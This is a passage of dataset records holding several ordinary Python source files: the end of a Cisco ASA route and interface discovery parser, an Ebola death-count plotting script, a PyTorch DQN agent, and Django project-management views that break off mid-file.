thisProtocol = NeighborProtocol.STATIC\n expectingNextHop = False\n elif rLine.startswith(\"[\") and expectingNextHop : pass\n else :\n thisProtocol = NeighborProtocol.UNKNOWN\n expectingNextHop = False\n # reset variables if current line is not a continuation\n if not expectingNextHop :\n prefix = \"\"\n maskLength = -1\n nextHop = \"\"\n adminDistance = \"\"\n routeMetric = \"\"\n parserSuccess = False\n outInterface = \"\"\n \n if thisProtocol != NeighborProtocol.UNKNOWN :\n if thisProtocol == NeighborProtocol.LOCAL or thisProtocol == NeighborProtocol.CONNECTED :\n # we expect an ip addresses-subnet mask pair in these lines\n prefixAndMask = GetIPAddressAndSubnetMaskFromLine(rLine)\n if prefixAndMask:\n prefix = prefixAndMask[0]\n maskLength = int(IPOperations.GetMaskLength(prefixAndMask[1]))\n # this line should also contain the out interface as the last word\n words = filter(None, rLine.split(','))\n asaNameif = words[-1]\n oif = self._interfaceParser.GetInterfaceByASANameIf(asaNameif, instance)\n if oif : outInterface = oif.Name\n else : outInterface = asaNameif\n expectingNextHop = False\n parserSuccess = True\n else:\n if not expectingNextHop:\n # we expect an ip addresses-subnet mask pair in these lines, and also a next-hop \n prefixAndMask = GetIPAddressAndSubnetMaskFromLine(rLine)\n if prefixAndMask:\n prefix = prefixAndMask[0]\n maskLength = int(IPOperations.GetMaskLength(prefixAndMask[1]))\n expectingNextHop = True \n \n if expectingNextHop:\n # get next-hop\n m = re.findall(R\"(?<=via )\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\", rLine)\n if len(m) == 1 :\n expectingNextHop = False\n parserSuccess = True\n nextHop = m[0]\n # get preference\n m = re.findall(r\"\\[(.*?)\\]\", rLine)\n if len(m) == 1 :\n preferences = filter(None, m[0].split('/'))\n adminDistance = preferences[0].strip('[')\n routeMetric = preferences[1].strip(']')\n # this line should also contain the out interface\n words = rLine.split(',')\n if len(words) > 1 : \n asaNameif = words[-1]\n oif = self._interfaceParser.GetInterfaceByASANameIf(asaNameif, instance)\n if oif : outInterface = oif.Name\n else : outInterface = asaNameif\n else:\n # only for debugging\n expectingNextHop = True \n \n if parserSuccess:\n try:\n rte = L3Discovery.RouteTableEntry()\n rte.RouterID = self.RouterID(thisProtocol, instance)\n rte.Prefix = prefix\n rte.MaskLength = maskLength\n rte.Protocol = str(thisProtocol)\n rte.AD = adminDistance\n rte.Metric = routeMetric\n rte.NextHop = nextHop\n rte.OutInterface = outInterface\n rte.Best = True # the show ip route output only lists best routes :-(\n rte.Tag = \"\"\n parsedRoutes.Add(rte)\n except Exception as Ex :\n msg = \"CiscoASA.RoutingTable() : error processing route table : {0}\".format(str(Ex))\n DebugEx.WriteLine(msg)\n \n except Exception as Ex:\n msg = \"CiscoASA.RoutingTable() :unexpected error while processing route table : {0}\".format(str(Ex))\n DebugEx.WriteLine(msg)\n raise Exception(msg)\n \n return parsedRoutes\n \nclass RouterIDCalculator():\n \"\"\"Performs Router ID and AS Number calculations \"\"\"\n def __init__(self, router):\n # self.Router will hold a reference to the parent CiscoASA instance\n self.Router = router\n # RouterID is a dictionary in dictionary, outer keyed by RoutingInstance name, inner keyed by RoutingProtocol as a string\n self.RouterID = {}\n # BGPASNumber is a dictionary, keyed by RoutingInstance name\n self.BGPASNumber = {} \n \n def GetRouterID(self, protocol, instance):\n \"\"\"Return the RouterID for given instance and protocol\"\"\"\n rid = \"\"\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if len(self.RouterID.get(instanceName, {})) == 0 : self.CalculateRouterIDAndASNumber(instance)\n instanceRIDs = self.RouterID.get(instanceName, None)\n if instanceRIDs :\n rid = instanceRIDs.get(str(protocol), \"\")\n return rid\n \n def GetBGPASNumber(self, instance):\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if len(self.BGPASNumber) == 0 : \n self.CalculateRouterIDAndASNumber(instance)\n return self.BGPASNumber.get(instanceName, \"\")\n \n def CalculateRouterIDAndASNumber(self, instance):\n \"\"\"Parse the RouterID and AS number for the requested RoutingInstance\"\"\" \n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.RouterID.get(instanceName, None) == None: self.RouterID[instanceName] = {}\n \n # Determine default router ID\n globalRouterID = ConnectionInfo.DeviceIP\n l3interfaces = Session.ExecCommand(\"sh interface ip brief\")\n if l3interfaces:\n try :\n loopbacks = [intf.lower() for intf in l3interfaces.splitlines() if intf.lower().startswith(\"loopback\") and GetIPAddressFromLine(intf)]\n if len(loopbacks) > 0 :\n # find the loopback with lowest number\n lowestLoopback = sorted(loopbacks, key=lambda i: int(i[8:10]))[0]\n if lowestLoopback:\n globalRouterID = lowestLoopback.split()[1]\n else:\n # no loopbacks, find the interface with highest ip address\n highestIPLine = (sorted(l3interfaces.splitlines(), key=lambda i: IP2Int(GetIPAddressFromLine(i)))[-1]).strip()\n if highestIPLine:\n globalRouterID = GetIPAddressFromLine(highestIPLine)\n except Exception as Ex :\n DebugEx.WriteLine(\"CiscoASA.CalculateRouterIDAndASNumber() : error while parsing interface information : \" + str(Ex))\n \n \n # get the running routing protocols for this routing instance\n runnintRoutingProtocols = self.Router.ActiveProtocols(instance)\n for thisProtocol in runnintRoutingProtocols: \n if thisProtocol == L3Discovery.NeighborProtocol.BGP:\n # construct CLI command\n cmd = \"show bgp summary\"\n \n bgpSummary = Session.ExecCommand(cmd)\n match = re.findall(r\"(?<=BGP router identifier )[\\d.]{0,99}\", bgpSummary, re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n \n # get also the BGP AS number\n match = re.findall(r\"(?<=local AS number )[\\d.]{0,99}\", bgpSummary, re.IGNORECASE) \n if len(match) == 1 :\n self.BGPASNumber[instanceName] = match[0]\n \n elif thisProtocol == L3Discovery.NeighborProtocol.OSPF:\n cmd = \"show ospf | i ID\"\n ospfGeneral = Session.ExecCommand(cmd)\n # expecting output like this:\n\t\t\t # Routing Process \"ospf 200\" with ID 10.9.254.251\n\t\t\t\t# Routing Process \"ospf 100\" with ID 192.168.1.1\n #\n # WARNING if more than one EIGRP process is running, generate error\n # \n if len(ospfGeneral.splitlines()) == 1 :\n match = re.findall(r\"(?<=ID )[\\d.]{0,99}\", ospfGeneral, re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n else:\n raise ValueError(\"Parsing more than one OSPF process is not supported by parser\")\n \n elif thisProtocol == L3Discovery.NeighborProtocol.EIGRP :\n cmd = \"show eigrp topology | i ID\"\n eigrpGeneral = Session.ExecCommand(cmd)\n # expecting output like this:\n # IP - EIGRP Topology Table for AS(10) / ID(10.9.240.1)\n # IP - EIGRP Topology Table for AS(20) / ID(10.9.240.1)\n #\n # TODO :\n # WARNING if more than one EIGRP process is running, generate error\n # \n if len(eigrpGeneral.splitlines()) == 1 :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", eigrpGeneral, re.IGNORECASE)\n if len(match) == 1 :\n self.RouterID[instanceName][str(thisProtocol)] = match[0]\n if globalRouterID == ConnectionInfo.DeviceIP : globalRouterID = match[0]\n else:\n raise ValueError(\"Parsing more than one EIGRP process is not supportedby parser\") \n \n elif thisProtocol == L3Discovery.NeighborProtocol.CDP:\n # only for default (global) routing instance\n if instanceName == self.Router._defaultRoutingInstanceName :\n self.RouterID[instanceName][str(thisProtocol)] = self.Router.GetHostName()\n \n elif thisProtocol == L3Discovery.NeighborProtocol.RIP:\n # always use global router-id\n # TODO : this may require tuning\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n \n elif thisProtocol == L3Discovery.NeighborProtocol.STATIC: \n # always use global router-id\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n elif thisProtocol == L3Discovery.NeighborProtocol.IPSEC: \n # Always use global router-id for IPSEC. \n # From networking perspective this is not meaningful but is rather a requirement of NetworkDiscoveryEngine\n # to associate a routerID for each neighbor protocol that is being discoverd.\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n else :\n self.RouterID[instanceName][str(thisProtocol)] = globalRouterID \n \n def Reset(self):\n self.RouterID = {}\n self.BGPASNumber = {}\n \nclass InterfaceParser(): \n \"\"\"Manage Cisco interfaces\"\"\"\n def __init__(self, router):\n # self.Router will hold a reference to the parent CiscoASA instance\n self.Router = router\n # These are the list of interfaces collected by ParseInterfaces() method. \n # A dictionary, keyed by routing instance name and containing Lists\n self.Interfaces = {}\n # Interface config cache. \n # A dictionary keyed by Interface Name and containing strings\n self._interfaceConfigurations = {}\n # The running configuration of router\n self._running_config = None\n # A dictionary to map interface names to ASA nameif properties\n self._ifNames = {}\n # A dictionary to map ASA nameif properties to interface names\n self._nameIfs = {}\n \n def ParseInterfaces(self, instance) :\n \"\"\"Collects interface details for all interfaces of specified routing instance, but do not collect interface configuration \"\"\"\n # Get the interfaces configurations\n if len(self._interfaceConfigurations) == 0 : self.ParseInterfaceConfigurations()\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # Query the device interfaces\n interfaces = Session.ExecCommand(\"show interface summary\").splitlines()\n # Parse the result and fill up self.Interfaces list\n ri = L3Discovery.RouterInterface()\n lineCount = len(interfaces)\n currentLineIndex = 1\n for line in interfaces:\n try: \n if line.lower().startswith(\"interface\") or currentLineIndex == lineCount :\n # this is either a new interface block, or the end of the interface list\n if ri and ri.Name :\n # Add actual interface if vrf name matches instanceName\n if not ri.VRFName and instanceName == self.Router._defaultRoutingInstanceName or ri.VRFName == instanceName:\n ri.Configuration = self.GetInterfaceConfiguration(ri.Name)\n if ri.Configuration.find(\"vlan \") >= 0 : \n ri.PortMode = L3Discovery.RouterInterfacePortMode.L3Subinterface\n subinterfaceDefinition = next((cline for cline in ri.Configuration.splitlines() if cline.startswith(\"vlan \")), \"\")\n ri.VLANS = subinterfaceDefinition.split(' ')[-1]\n elif ri.Address : ri.PortMode = L3Discovery.RouterInterfacePortMode.Routed\n else : ri.PortMode = L3Discovery.RouterInterfacePortMode.Unknown\n ri.Description = next((cline for cline in ri.Configuration.splitlines() if cline.startswith(\"description\")), \"\")\n self.Interfaces[instanceName].Add(ri) \n if currentLineIndex == lineCount :\n break\n words = filter(None, line.split(' '))\n interfaceName = words[1]\n if self.IsInterrestingInterface(interfaceName):\n # Create new interface \n ri = L3Discovery.RouterInterface()\n # words should look like : Interface,GigabitEthernet0/0,\"outside\",is,up,line,protocol,is,up\n ri.LogicalSystemName = \"Default\" \n ri.Name = interfaceName\n status = [i.strip(',') for i in words if \"up\" in i.lower() or \"down\" in i.lower()]\n ri.Status = \",\".join(status)\n else:\n # this line belongs to an iterface information block\n sline = line.strip().lower()\n if sline.startswith(\"ip address\"):\n addressAndMask = GetIPAddressAndSubnetMaskFromLine(sline)\n if len(addressAndMask) == 2:\n ri.Address = addressAndMask[0]\n ri.MaskLength = str(IPOperations.GetMaskLength(addressAndMask[1]))\n \n # PortMode and VLANS will be processed later in a second pass\n except Exception as Ex:\n DebugEx.WriteLine(\"CiscoASA.InterfaceParser.ParseInterfaces() : error parsing text {0}. Error is {1}\".format(line, str(Ex)))\n \n currentLineIndex += 1\n \n def GetRoutedInterfaces(self, instance):\n \"\"\" Return the list of RouterInterfaces that have a valid IPAddress\"\"\"\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : \n self.ParseInterfaces(instance)\n routedInterfaces = filter(lambda x: x.Address, self.Interfaces[instanceName])\n return routedInterfaces\n \n def GetAllInterfaces(self, instance):\n \"\"\" Return the list of device interfaces\"\"\"\n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n return self.Interfaces[instanceName]\n \n def GetInterfaceByASANameIf(self, asaNameif, instance):\n \"\"\"Returns a RouterInterface object for the interface specified by its ASA nameif property\"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n # map ASA namif to interface name\n ifName = self._nameIfs.get(asaNameif.strip(), None)\n if ifName:\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Name == ifName), None)\n return foundInterface \n \n def GetInterfaceByName(self, ifName, instance):\n \"\"\"Returns a RouterInterface object for the interface specified by its name\"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Name == ifName.strip()), None)\n return foundInterface\n \n def GetInterfaceNameByAddress(self, ipAddress, instance):\n \"\"\" Returns a RouterInterface object for the interface specified by its ip address \"\"\" \n # Init interface dictionary for instance\n instanceName = self.Router._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n if self.Interfaces.get(instanceName, None) == None:\n self.Interfaces[instanceName] = [] \n # check interface list for this instance\n if len(self.Interfaces[instanceName]) == 0 : self.ParseInterfaces(instance)\n ifName = \"\"\n foundInterface = next((intf for intf in self.Interfaces[instanceName] if intf.Address == ipAddress), None)\n if foundInterface != None:\n ifName = foundInterface.Name\n return ifName \n \n def GetInterfaceConfiguration(self, ifName):\n \"\"\" Return the configuration of an interface \"\"\"\n if len(self._interfaceConfigurations) == 0 : self.ParseInterfaceConfigurations()\n # Use interface name without unit name to get full configuration\n # intfName = re.sub(r\"\\.\\d+$\", \"\", ifName)\n ifConfig = self._interfaceConfigurations.get(ifName, \"\")\n return ifConfig \n \n def ParseInterfaceConfigurations(self):\n \"\"\"Gets router running configurtion to collect interface configurations\"\"\" \n # Get running configuration to parse\n if not self._running_config:\n self._running_config = Session.ExecCommand(\"show running-config interface\")\n if len(self._running_config) < 100 and \"Command authorization failed\" in self._running_config:\n # some systems may not allow running \"show run\" but still allow \"show tech\", let's give a try :-)\n tech_support_ipc = Session.ExecCommand(\"show tech-support\")\n temp_running_config = []\n riBlock = False\n for line in tech_support_ipc.splitlines():\n if riBlock:\n if line.find(\"--- show\") > 0:\n # end of running configuration block\n break\n temp_running_config.append(line)\n else:\n if line.find(\"--- show running-config ---\") > 0:\n # start of running configuration block\n riBlock = True\n self._running_config = \"\\r\\n\".join(temp_running_config)\n \n self._interfaceConfigurations = {}\n self._ifNames = {}\n self._nameIfs = {}\n currentIntfName = \"\"\n currentIntfConfig = []\n for thisLine in self._running_config.splitlines():\n try:\n words = thisLine.split(\" \")\n if thisLine.startswith(\"interface\") and len(words) == 2 :\n # This should be a new interface definition\n if currentIntfName != \"\":\n # add previous interface\n self._interfaceConfigurations[currentIntfName] = \"\\r\\n\".join(currentIntfConfig)\n # Clear current configuration\n currentIntfConfig = []\n currentIntfName = words[1]\n else:\n sline = thisLine.strip(' ')\n if sline != \"!\" :\n currentIntfConfig.append(sline)\n # region memorize ASA nameif properties\n m = re.findall(r\"(?<=nameif ).*\", sline)\n if len(m) == 1:\n nameif = m[0].strip()\n self._ifNames[currentIntfName] = nameif\n self._nameIfs[nameif] = currentIntfName\n \n except Exception as Ex:\n message = \"CiscoASA.InterfaceParser.ParseInterfaceConfigurations() : could not parse an interface configuration for line <{0}>. Error is : {1} \".format(thisLine, str(Ex))\n DebugEx.WriteLine(message) \n \n def IsInterrestingInterface(self, intfName):\n \"\"\" Determines if a given name is an interface name we want to parse\"\"\"\n iname = intfName.lower()\n return iname.startswith(\"fastethernet\") or iname.startswith(\"gigabitethernet\") or iname.startswith(\"tengigabitethernet\") or iname.startswith(\"ethernet\") or iname.startswith(\"loopback\") or iname.startswith(\"vlan\") or iname.startswith(\"tunnel\")\n \n def Reset(self) :\n self.Interfaces = {}\n self._interfaceConfigurations = {}\n self._running_config = None\n \n def InterfaceNameToShort(self, longName):\n \"\"\"Converts a long Cisco interface name to its short representation\"\"\"\n inputName = longName.lower()\n shortName = \"\"\n if inputName.startswith(\"fastethernet\") : shortName = input.replace(\"fastethernet\", \"fa\")\n elif inputName.StartsWith(\"tengigabitethernet\") : shortName = input.replace(\"tengigabitethernet\", \"te\")\n elif inputName.StartsWith(\"gigabitethernet\") : shortName = input.replace(\"gigabitethernet\", \"gi\")\n elif inputName.StartsWith(\"ethernet\") : shortName = input.replace(\"ethernet\", \"eth\")\n elif inputName.StartsWith(\"loopback\") : shortName = input.replace(\"loopback\", \"lo\")\n return shortName \n \n def InterfaceNameToLong(self, shortName):\n \"\"\"Converts a short Cisco interface name to its long representation\"\"\"\n inputName = shortName.lower()\n longName = \"\"\n if inputName.startswith(\"fa\") and inputName.find(\"fastethernet\") < 0 : longName = inputName.replace(\"fa\", \"fastethernet\")\n elif inputName.startswith(\"te\") and inputName.find(\"tengigabitethernet\") < 0 : longName = inputName.replace(\"te\", \"tengigabitethernet\")\n elif inputName.startswith(\"gi\") and inputName.find(\"gigabitethernet\") < 0 : longName = inputName.replace(\"gi\", \"gigabitethernet\")\n elif inputName.startswith(\"eth\") and inputName.find(\"ethernet\") < 0 :longName = inputName.replace(\"eth\", \"ethernet\")\n elif inputName.startswith(\"lo\") and inputName.find(\"loopback\") < 0 : longName = inputName.replace(\"lo\", \"loopback\")\n return longName;\n \n \ndef GetColumnValue(textLine, headerLine, headerColumn, headerSeparator):\n \"\"\"Returns the substring from textLine in column determined by the position of position of headerColumn in headerLine\"\"\"\n headerColumnNames = map(lambda i: i.strip(), filter(None, headerLine.split(headerSeparator)))\n headerCount = len(headerColumnNames)\n requestedColumnIndex = headerColumnNames.index(headerColumn)\n nextColumnName = \"\"\n try:\n nextColumnName = headerColumnNames[ requestedColumnIndex + 1 ]\n except:\n pass\n s = headerLine.index(headerColumn)\n e = len(textLine)\n if nextColumnName : e = headerLine.index(nextColumnName)\n return textLine[s:e].strip() \n \ndef IP2Int(ip):\n \"\"\"Converts a string literal ip address to its integer value\"\"\"\n try:\n if not ip:\n return -1\n o = map(int, ip.split('.'))\n res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]\n return res \n except:\n return -1\n \ndef GetIPAddressFromLine(line):\n \"\"\"Extracts the first IP address match from a line of text and returns it\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n address = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(address) == 1 : \n return address[0]\n else: \n return \"\" \n \ndef GetIndexedIPAddressFromLine(line, index):\n \"\"\"Extracts the indexed number IP address match from a line of text and returns it. Index is 1 based.\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n addresses = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(addresses) >= index : \n return addresses[index-1]\n else: \n return \"\" \n \ndef GetIPAddressAndSubnetMaskFromLine(line):\n \"\"\"Extracts the first and second IP address match from a line of text and returns them\n Expected format is aaa.bbb.ccc.ddd\"\"\"\n addresses = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\", line)\n if len(addresses) >= 2 : \n return [addresses[0], addresses[1]]\n else: \n return \"\" \n \ndef GetIPAddressAndMaskFromLine(line):\n \"\"\"Extracts the first match of an IP address and mask from a line of text and returns it\n Expected format is aaa.bbb.ccc.ddd/xx\"\"\"\n address = re.findall(r\"(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\/\\d{1,2}\", line)\n if len(address) == 1 : \n return address[0]\n else: \n return \"\"\n \ndef GetRegexGroupMatches(pattern, text, groupNum):\n \"\"\"Returns the list of values of specified Regex group number for all matches. Returns Nonde if not matched or groups number does not exist\"\"\"\n try:\n result = []\n mi = re.finditer(pattern, text, re.MULTILINE)\n for matchnum, match in enumerate(mi):\n # regex group 1 contains the connection remote address\n result.append(match.group(groupNum))\n return result\n except :\n return None\n \n################### Script entry point ###################\nif ConnectionInfo.Command == \"CreateInstance\":\n ActionResult = CiscoASA()\n ScriptSuccess = True\n ","sub_path":"CiscoASA.py","file_name":"CiscoASA.py","file_ext":"py","file_size_in_byte":43196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498967761","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017/11/30 6:44\n\nEbola案例:确认的、可能的、疑似的Ebola死亡累积数\n\n数据源:ebola_data_db_format.csv\n\n线图\n\nhttps://ds-ec2.scraperwiki.com/g7nnqgn/ckm9nsfssakeuor/cgi-bin/csv/ebola_data_db_format.csv\n\n@author: wangdongsong1229@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport csv\nimport operator\nimport datetime as dt\nimport os\n\nbasePath = os.path.abspath(\"..\")\ndataFilePath = basePath + \"/resources/ebola_data_db_format.csv\"\nkey = \"Cumulative number of confirmed, probable and suspected Ebola deaths\"\n\nwith open(dataFilePath, \"rt\") as f:\n filterdata = [row for row in csv.reader(f) if row[3] != \"0.0\" and row[3] != \"0\" and \"deaths\" in row[0] and row[2][0:4] == \"2014\"]\n\n sorteddata = sorted(filterdata, key=operator.itemgetter(1))\n guineadata = [row for row in sorteddata if row[1] == \"Guinea\" and row[0] == key]\n sierradata = [row for row in sorteddata if row[1] == \"Sierra Leone\" and row[0] == key]\n liberiadata = [row for row in sorteddata if row[1] == \"Liberia\" and row[0] == key]\n\n g_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in guineadata]\n g_y = [row[3] for row in guineadata]\n\n s_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in sierradata]\n s_y = [row[3] for row in sierradata]\n\n l_x = [dt.datetime.strptime(row[2], \"%Y-%m-%d\").date() for row in liberiadata]\n l_y = [row[3] for row in liberiadata]\n\n plt.figure(figsize=(10, 10))\n plt.plot(g_x, g_y, color=\"red\", linewidth=2, label=\"Guinea\")\n plt.plot(s_x, s_y, color=\"orange\", linewidth=2, label=\"Sierradata Leone\")\n plt.plot(l_x, l_y, color=\"blue\", linewidth=2, label=\"Liberia\")\n\n plt.xlabel(\"Date\", fontsize=18)\n\n plt.ylabel(\"Number of Ebola Deaths\", fontsize=18)\n\n plt.title(\"Confirmed Ebola Deaths\", fontsize=20)\n\n plt.legend(loc=2)\n\n plt.show()\n","sub_path":"com/wds/data_visualization/visualization/ebola2.py","file_name":"ebola2.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"465225305","text":"import math\nimport random\n\nimport numpy as np\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom models.agents.agent import Agent\nfrom models.agents.replaybuffer import ReplayBuffer\n\n\"\"\"\nDeep Q Network\nhttps://www.cs.toronto.edu/%7Evmnih/docs/dqn.pdf\n\nThis implementation uses a lazy initialization of the DQN as I wanted to keep it general enough to fit different \nstate vector lengths. However, future Agents, such as the DuelingAgent do not do this, as I intended to set the\nstate vector length to the maximum.\n\nhttps://github.com/higgsfield/RL-Adventure/blob/master/1.dqn.ipynb\nWritten before Variable was deprecated, but I couldn't fully convert it to only Tensors without errors\n\"\"\"\n\n\nclass DQN(nn.Module):\n def __init__(self, num_inputs, num_actions, hidden_size, device):\n super(DQN, self).__init__()\n self.num_inputs = num_inputs\n self.num_actions = num_actions\n\n self.device = device\n\n self.layers = nn.Sequential(\n nn.Linear(num_inputs, hidden_size),\n nn.ELU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ELU(),\n nn.Linear(hidden_size, num_actions)\n ).to(device)\n\n def forward(self, x):\n return self.layers(x)\n\n def act(self, state, epsilon):\n if random.random() > epsilon:\n state = autograd.Variable(torch.FloatTensor(state).unsqueeze(0)).to(self.device)\n q_value = self.forward(state)\n action = q_value.max(1)[1].data[0]\n\n else:\n action = random.randrange(self.num_actions)\n return action\n\n\nclass DQNAgent(Agent):\n def __init__(self, hidden=128):\n super(DQNAgent, self).__init__()\n # Set hyperparameters\n self.gamma = 0.99\n self.epsilon_start = 1\n self.epsilon_end = 0.01\n self.epsilon_decay = 500\n self.batch_size = 32\n self.epsilon_by_frame = lambda step: self.epsilon_end + (self.epsilon_start - self.epsilon_end) *\\\n math.exp(-1. * step / self.epsilon_decay)\n self.frame = 0\n\n self.model = None\n self.hidden_size = hidden\n self.optimizer = None\n self.replay = ReplayBuffer(1000)\n self.prev_info = None # Previous state\n\n self.prev_prev = None # Previous previous, for replay buffer\n self.action = None # Action for replay buffer\n\n self.losses = []\n # Set CUDA\n use_cuda = torch.cuda.is_available()\n self.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n # Not really sure how python inheritance works, so re-declaring so that PyCharm doesn't complain\n self.choices = 3\n self.prev_rwd = 0\n self.cum_rewards = []\n\n def choose(self, information):\n # If model does not exist, i.e. first frame, initialize model and uninitialized parameters\n if not self.model:\n # Needs to be in separate conditional in case model is defined manually\n self.model = DQN(len(information), self.choices, self.hidden_size, self.device)\n if not self.optimizer:\n self.optimizer = optim.Adam(self.model.parameters())\n self.prev_info = np.zeros(len(information))\n\n epsilon = self.epsilon_by_frame(self.frame)\n self.action = self.model.act(information, epsilon)\n\n # Decay Epsilon, update histories\n self.frame += 1\n self.replay.push(state=self.prev_info, action=self.action, reward=0, next_state=information, done=0)\n self.prev_prev = self.prev_info\n self.prev_info = information\n\n if len(self.replay) > self.batch_size:\n loss = self.compute_td_loss(self.batch_size)\n self.losses.append(loss.item())\n\n # Sometimes returns tensor, I don't know why?\n return int(self.action)\n\n def compute_td_loss(self, batch_size):\n state, action, reward, next_state, done = self.replay.sample(batch_size)\n\n state = autograd.Variable(torch.FloatTensor(np.float32(state))).to(self.device)\n next_state = autograd.Variable(torch.FloatTensor(np.float32(next_state))).to(self.device)\n action = autograd.Variable(torch.LongTensor(action)).to(self.device)\n reward = autograd.Variable(torch.FloatTensor(reward)).to(self.device)\n done = autograd.Variable(torch.FloatTensor(done)).to(self.device)\n\n q_values = self.model(state)\n next_q_values = self.model(next_state)\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n expected_q_value = reward + self.gamma * next_q_value * (1 - done)\n\n loss = (q_value - autograd.Variable(expected_q_value.data)).pow(2).mean()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return loss\n\n def reward(self, reward):\n self.cum_rewards.append(self.prev_rwd + reward)\n self.prev_rwd = reward\n # Update replay buffer with done flag\n try:\n self.replay.buffer.pop()\n except IndexError:\n pass\n self.replay.push(self.prev_prev, self.action, reward, self.prev_info, 1)\n\n def store(self, filename):\n torch.save(self.model.state_dict(), 'dqn' + filename + '.pkl')\n","sub_path":"bin/models/agents/DQNAgent.py","file_name":"DQNAgent.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"154794083","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, Group\nfrom .models import Project\nfrom .forms import ProjectModelForm\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n# Create your views here.\n\ndef HomeView(request):\n if request.user.is_authenticated:\n return render(request, 'index.html')\n else:\n return redirect('/accounts/login/')\n\n\n@login_required\ndef ProjectView(request): \n if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n project_list = Project.objects.order_by('-id')\n else:\n project_list = Project.objects.filter(created_by=request.user.id).order_by('-id')\n\n paginator = Paginator(project_list, 10) # Show 10 contacts per page\n page = request.GET.get('page')\n projects = paginator.get_page(page)\n\n queryset = request.GET.get('q')\n total = project_list.count()\n if queryset:\n queryset = Project.objects.filter(Q(title__icontains=queryset))\n total = queryset.count()\n context = {\n 'queryset': queryset,\n 'total': total,\n 'projects': projects\n }\n return render(request, 'dashboard/projects.html', context)\n\n\n@login_required\ndef ProjectCreateView(request): \n form = ProjectModelForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.created_by = request.user.id\n obj.save()\n messages.success(request, 'Project added successfully.')\n return redirect('/projects/')\n\n context = {\n 'form': form,\n 'valueBtn': 'Add',\n 'title': 'Create Project',\n }\n return render(request, 'dashboard/project_create.html', context)\n\n\n@login_required\ndef ProjectUpdateView(request, pk):\n if request.user.groups.all()[0].name in ['Admin', 'Executive Director', 'Project Manager']:\n project = get_object_or_404(Project, pk=pk)\n else:\n project = get_object_or_404(Project, pk=pk, created_by=request.user.id)\n form = ProjectModelForm(request.POST or None, request.FILES or None, instance=project)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.updated_by = request.user.id\n obj.save()\n messages.success(request, 'Project was updated successfully.')\n return redirect('/projects/')\n context = {\n 'form': form,\n 'valueBtn': 'Update',\n 'title': 'Update Project',\n }\n return render(request, 'dashboard/project_create.html', context)\n\n\n@login_required\ndef 